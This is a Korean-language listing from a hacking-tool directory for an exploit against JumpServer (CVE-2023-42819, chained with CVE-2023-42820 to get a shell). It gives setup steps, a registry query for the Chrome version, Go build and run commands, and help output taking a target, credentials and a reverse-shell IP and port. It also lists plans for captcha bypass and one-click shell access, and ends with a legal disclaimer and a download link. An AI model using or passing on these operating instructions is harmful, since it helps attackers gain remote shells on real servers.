Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-42819 — CVE-2023-42819 | Kitploit
도구/GitHubGitHub/c1ph3rx13/cve-2023-42819
Payload GenerationVulnerability AnalysisExploitationShellcodeWeb Application ExploitationPenetration Testing
GitHubc1ph3rx13/cve-2023-42819

CVE-2023-42819

CVE-2023-42819

저장소 보기
632년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2023-42819

CVE-2023-42819

취약점 설명

JumpServer 임의 파일 쓰기 취약점

CVE-2023-42819 + CVE-2023-42820 = GetShell

USAGE

  1. 스크립트와 필요한 파일을 같은 디렉터리에 두십시오.

  2. Google Chrome이 설치되어 있는지 확인하고, Google Chrome의 버전 번호를 확인하십시오.

root@kitploit:~
reg query "HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon" /v version
  1. Google Chrome의 버전 번호와 시스템에 맞는 chromedriver를 다운로드한 후, webdriver에 넣으십시오.

    최신 버전: https://googlechromelabs.github.io/chrome-for-testing/

    이전 버전: https://chromedriver.chromium.org/downloads/version-selection

    요구사항이 정말 많네 : (

  2. 해당 IP와 Port를 리슨하고, 리버스 셸을 기다리십시오.

Python Version

root@kitploit:~
 ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗       ██╗  ██╗██████╗  █████╗  ██╗ █████╗
██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗      ██║  ██║╚════██╗██╔══██╗███║██╔══██╗
██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗███████║ █████╔╝╚█████╔╝╚██║╚██████║
██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝╚════██║██╔═══╝ ██╔══██╗ ██║ ╚═══██║
╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝           ██║███████╗╚█████╔╝ ██║ █████╔╝
 ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝            ╚═╝╚══════╝ ╚════╝  ╚═╝ ╚════╝

                                                                            @Auth: C1ph3rX13
                                                                            @Blog: https://c1ph3rx13.github.io
                                                                            @Note: 代码仅供学习使用,请勿用于其他用途

usage: CVE-2023-42819-Fin.py [-h] -t TARGET -u USERNAME -p PASSWORD --ip IP --port PORT [--proxy PROXY]

CVE-2023-42819 by C1ph3rX13.

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        target url
  -u USERNAME, --username USERNAME
                        account username
  -p PASSWORD, --password PASSWORD
                        account password
  --ip IP               shell ip
  --port PORT           shell port
  --proxy PROXY         proxy to http://ip:port

image-1

image-1

Go Version

Build

root@kitploit:~
go mod init CVE-2023-42819
go mod tidy
go build -ldflags="-s -w" -trimpath

Run

root@kitploit:~
.\CVE-2023-42819.exe -t http://IP:Port -u username -p password -ip IP -port Port -proxy proxyUrl
             

        ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗       ██╗  ██╗██████╗  █████╗  ██╗ █████╗  
        ██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗      ██║  ██║╚════██╗██╔══██╗███║██╔══██╗
        ██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗███████║ █████╔╝╚█████╔╝╚██║╚██████║
        ██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝╚════██║██╔═══╝ ██╔══██╗ ██║ ╚═══██║
        ╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝           ██║███████╗╚█████╔╝ ██║ █████╔╝
        ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝            ╚═╝╚══════╝ ╚════╝  ╚═╝ ╚════╝  
                                                                                                                
    @Auth: C1ph3rX13                                                                                            
    @Blog: https://c1ph3rx13.github.io                                                                          
    @Note: 代码仅供学习使用,请勿用于其他用途                                                                   

Usage of CVE-2023-42819.exe:
  -ip string                                                                  
        Shell IP
  -p string
        Account Password
  -port string
        Shell Port
  -proxy string
        Proxy Url
  -t string
        Target Url
  -u string
        Account Username

image-1

TODO

  • 크로스 도메인 해결 방식이 충분히 우아하지 않음
  • httpx를 사용하여 재작성
  • EXP func 추가
  • go-resty를 사용하여 재작성
  • 잘못된 비밀번호로 로그인 시 캡차가 나타나 이를 우회
  • 리버스 셸 유형 추가
  • headless 모드를 사용하여 Linux 호환
  • http, https, socks 프록시 추가
  • CVE-2023-42819 + CVE-2023-42820 원클릭 GetShell
  • 플래그를 이렇게 많이 세우면 완료하지 못할지도 몰라 : (

유지보수

  • 2023-10-18 웹사이트 자동화 감지 우회 추가 - Python Version
  • 2023-10-18 클라이언트 함수 재구성
  • 2023-10-18 실행 로직 단순화
  • 2023-10-18 Linux 테스트 OK - Go Version

면책 조항

  1. 본 도구는 합법적인 권한을 보유한 침투 테스트 보안 담당자와 일상적인 운영을 수행하는 네트워크 운영 유지보수 담당자만을 대상으로 합니다. 사용자는 충분한 합법적 권한을 획득하고 비상업적 목적이라는 전제 하에 다운로드, 복제, 배포 또는 사용할 수 있습니다.

  2. 본 도구를 사용하는 과정에서 귀하의 모든 행위가 현지 법률 및 규정을 준수하는지 확인해야 하며, 이 소프트웨어를 중화인민공화국 관련 법률을 위반하는 활동에 사용해서는 안 됩니다. 본 도구의 모든 작성자와 기여자는 사용자가 본 도구를 임의로 사용하여 불법 활동을 수행함으로써 발생하는 어떠한 책임도 지지 않습니다.

도구 다운로드